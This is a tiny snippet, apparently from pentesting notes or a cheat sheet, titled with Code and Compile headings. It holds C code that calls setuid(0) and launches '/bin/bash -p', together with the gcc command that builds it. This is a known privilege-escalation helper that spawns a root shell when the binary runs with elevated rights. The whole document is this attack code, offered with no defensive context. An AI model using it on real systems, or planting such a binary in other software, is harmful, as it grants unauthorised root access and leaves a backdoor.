######## Code ######## int main() { setuid(0); system("/bin/bash -p"); } ######## Compile ######## gcc -o myfile myfile.c
Last updated 1 year ago